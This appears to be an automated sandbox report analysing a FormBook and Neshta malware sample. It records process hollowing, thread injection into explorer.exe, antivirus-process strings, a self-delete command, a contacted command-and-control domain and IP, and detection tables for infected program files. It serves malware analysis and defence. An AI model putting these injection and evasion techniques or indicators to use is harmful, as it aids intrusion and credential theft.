          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A1C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A42AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A42ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A54A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A54A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A28A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A15210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\help.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.agileintelligence.coach
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeSection loaded: unknown target: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeThread register set: target process: 3440
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeThread register set: target process: 3440
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeThread register set: target process: 3440
          Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 3440
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: E0000
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeSection unmapped: C:\Windows\SysWOW64\help.exe base address: 10A0000
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeProcess created: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeProcess created: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeProcess created: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'
          Source: vi0EwpbUht.exe, 00000001.00000002.584593645.0000000000DB0000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.442375787.00000000083E9000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: vi0EwpbUht.exe, 00000001.00000002.584593645.0000000000DB0000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.336952872.00000000008B8000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: vi0EwpbUht.exe, 00000001.00000002.584593645.0000000000DB0000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.372075782.0000000000EE0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: vi0EwpbUht.exe, 00000001.00000002.584593645.0000000000DB0000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.372075782.0000000000EE0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: GetLocaleInfoA,
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: GetLocaleInfoA,
          Source: C:\Windows\svchost.comCode function: GetLocaleInfoA,
          Source: C:\Windows\svchost.comCode function: GetLocaleInfoA,
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040F270 GetLocalTime,
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeCode function: 1_2_0040D815 GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId,
          Source: vi0EwpbUht.exe, 00000001.00000003.441467911.00000000022C4000.00000004.00000001.sdmpBinary or memory string: MSASCui.exe
          Source: vi0EwpbUht.exe, 00000001.00000003.441467911.00000000022C4000.00000004.00000001.sdmpBinary or memory string: MsMpEng.exe

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara matchFile source: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000001.366394202.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.561947063.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.337333387.00000000030E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.476443406.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.475830618.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.373308889.00000000022B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.584337141.0000000002680000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.561291954.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.2.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.1.elxhan.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.elxhan.exe.22b0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.1.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.vi0EwpbUht.exe.30e0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.elxhan.exe.22b0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.elxhan.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.vi0EwpbUht.exe.30e0000.4.unpack, type: UNPACKEDPE
          Yara detected Neshta
          Source: Yara matchFile source: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vi0EwpbUht.exe PID: 7096, type: MEMORY
          Source: Yara matchFile source: 1.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.svchost.com.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook (same Yara matches as listed under Stealing of Sensitive Information above)

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Native API [1] | Windows Service [1] | Windows Service [1] | Deobfuscate/Decode Files or Information [1] | Credential API Hooking [1] | System Time Discovery [1] | Taint Shared Content [1] | Archive Collected Data [1] | Exfiltration Over Other Network Medium | Ingress Tool Transfer [1] | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot [1]
          Default Accounts | Shared Modules [1] | Registry Run Keys / Startup Folder [11] | Process Injection [512] | Obfuscated Files or Information [2] | Input Capture [11] | System Network Connections Discovery [1] | Remote Desktop Protocol | Credential API Hooking [1] | Exfiltration Over Bluetooth | Encrypted Channel [1] | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Registry Run Keys / Startup Folder [11] | Software Packing [11] | Security Account Manager | File and Directory Discovery [4] | SMB/Windows Admin Shares | Input Capture [11] | Automated Exfiltration | Non-Application Layer Protocol [2] | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Rootkit [1] | NTDS | System Information Discovery [114] | Distributed Component Object Model | Clipboard Data [1] | Scheduled Transfer | Application Layer Protocol [12] | SIM Card Swap |  | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading [321] | LSA Secrets | Query Registry [1] | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion [31] | Cached Domain Credentials | Security Software Discovery [241] | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection [512] | DCSync | Process Discovery [2] | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | Virtualization/Sandbox Evasion [31] | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | Remote System Discovery [1] | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station |  | Data Destruction
          Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | System Network Configuration Discovery [1] | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols |  |  | Data Encrypted for Impact

          Behavior Graph

          Behavior Graph ID: 432848 | Sample: vi0EwpbUht | Start date: 10/06/2021 | Architecture: WINDOWS | Score: 100

          Sample-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 9 other signatures

          Process tree recovered from the graph (dropped files and per-process signatures listed under each node):

          • vi0EwpbUht.exe (started)
            Dropped: C:\Windows\svchost.com (PE32); C:\Users\user\AppData\Local\...\setup.exe (PE32); C:\Users\user\AppData\...\vi0EwpbUht.exe (PE32); 10 other malicious files
            Signatures: Creates an undocumented autostart registry key; Drops PE files with a suspicious file extension; Drops executable to a common third party application directory; Infects executable files (exe, dll, sys, html)
            • vi0EwpbUht.exe (started)
              Dropped: C:\Users\user\AppData\Roaming\...\elxhan.exe (PE32); C:\Users\user\AppData\Local\...\System.dll (PE32)
              Signatures: Detected unpacking (changes PE section rights); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
              • vi0EwpbUht.exe (started)
                Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                • explorer.exe (injected)
                  DNS/IP: www.agileintelligence.coach; agileintelligence.coach 34.102.136.180, 49753, 80 GOOGLEUS United States
                  Signatures: System process connects to network (likely due to code injection or exploit); Drops executables to the windows directory (C:\Windows) and starts them; Uses netstat to query active network connections and open ports
                  • svchost.com (started)
                    Dropped: C:\...\protocolhandler.exe (PE32); C:\Program Files (x86)\...\misc.exe (PE32); C:\Program Files (x86)\...\lynchtmlconv.exe (PE32); 98 other malicious files
                    Signatures: Sample is not signed and drops a device driver; Drops executable to a common third party application directory; Infects executable files (exe, dll, sys, html)
                    • elxhan.exe (started)
                      Dropped: C:\Users\user\AppData\Local\...\System.dll (PE32)
                      Signatures: Detected unpacking (changes PE section rights); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                      • elxhan.exe (started)
                        Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique
                  • NETSTAT.EXE (started)
                    Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                    • cmd.exe (started)
                      • conhost.exe (started)
                  • help.exe (started)

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label | Link
vi0EwpbUht.exe | 91% | Metadefender | | Browse
vi0EwpbUht.exe | 100% | ReversingLabs | Win32.Virus.Neshta |
vi0EwpbUht.exe | 100% | Avira | W32/Neshta.A |
vi0EwpbUht.exe | 100% | Joe Sandbox ML | |

          Dropped Files

Source | Detection | Scanner | Label | Link
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe | 100% | Avira | W32/Neshta.A |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | 100% | Avira | W32/Neshta.A |
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | 100% | Avira | W32/Neshta.A |
C:\Program Files (x86)\AutoIt3\Au3Info.exe | 100% | Avira | W32/Neshta.A |
C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe | 100% | Avira | W32/Neshta.A |
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | 100% | Avira | W32/Neshta.A |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe | 100% | Avira | W32/Neshta.A |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe | 100% | Avira | W32/Neshta.A |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe | 100% | Avira | W32/Neshta.A |
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | 100% | Avira | W32/Neshta.A |
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | 100% | Avira | W32/Neshta.A |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe | 100% | Avira | W32/Neshta.A |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | 100% | Avira | W32/Neshta.A |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe | 100% | Avira | W32/Neshta.A |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe | 100% | Avira | W32/Neshta.A |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe | 100% | Avira | W32/Neshta.A |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe | 100% | Avira | W32/Neshta.A |
C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe | 100% | Avira | W32/Neshta.A |
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Avira | W32/Neshta.A |
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | 100% | Avira | W32/Neshta.A |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe | 100% | Avira | W32/Neshta.A |
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe | 100% | Avira | W32/Neshta.A |
C:\Program Files (x86)\AutoIt3\Uninstall.exe | 100% | Avira | W32/Neshta.A |
C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe | 100% | Avira | W32/Neshta.A |
C:\Program Files (x86)\AutoIt3\Au3Check.exe | 100% | Avira | W32/Neshta.A |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe | 100% | Avira | W32/Neshta.A |
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | 100% | Avira | W32/Neshta.A |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe | 100% | Avira | W32/Neshta.A |
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | 100% | Avira | W32/Neshta.A |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe | 100% | Avira | W32/Neshta.A |
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Avira | W32/Neshta.A |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\AutoIt3\Au3Info.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe | 100% | Joe Sandbox ML | |
C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\AutoIt3\Uninstall.exe | 100% | Joe Sandbox ML | |
C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\AutoIt3\Au3Check.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe | 96% | ReversingLabs | Win32.Virus.Neshta |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe | 96% | ReversingLabs | Win32.Virus.Neshta |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | 96% | ReversingLabs | Win32.Virus.Neshta |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe | 97% | ReversingLabs | Win32.Virus.Neshta |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe | 100% | ReversingLabs | Win32.Virus.Neshta |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe | 91% | Metadefender | | Browse
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe | 100% | ReversingLabs | Win32.Virus.Neshta |

          Unpacked PE Files

Source | Detection | Scanner | Label | Link | Download
1.2.vi0EwpbUht.exe.400000.0.unpack | 100% | Avira | W32/Neshta.A | | Download File
7.1.elxhan.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
2.2.vi0EwpbUht.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482 | | Download File
17.2.NETSTAT.EXE.292ed78.2.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
5.2.svchost.com.400000.0.unpack | 100% | Avira | W32/Neshta.A | | Download File
3.1.vi0EwpbUht.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
6.2.elxhan.exe.22b0000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
3.2.vi0EwpbUht.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
7.2.elxhan.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
6.2.elxhan.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482 | | Download File
17.2.NETSTAT.EXE.328f834.5.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
3.0.vi0EwpbUht.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482 | | Download File
2.0.vi0EwpbUht.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482 | | Download File
2.2.vi0EwpbUht.exe.2ff0000.3.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
5.0.svchost.com.400000.0.unpack | 100% | Avira | W32/Neshta.A | | Download File
6.0.elxhan.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482 | | Download File
2.2.vi0EwpbUht.exe.30e0000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
1.0.vi0EwpbUht.exe.400000.0.unpack | 100% | Avira | W32/Neshta.A | | Download File
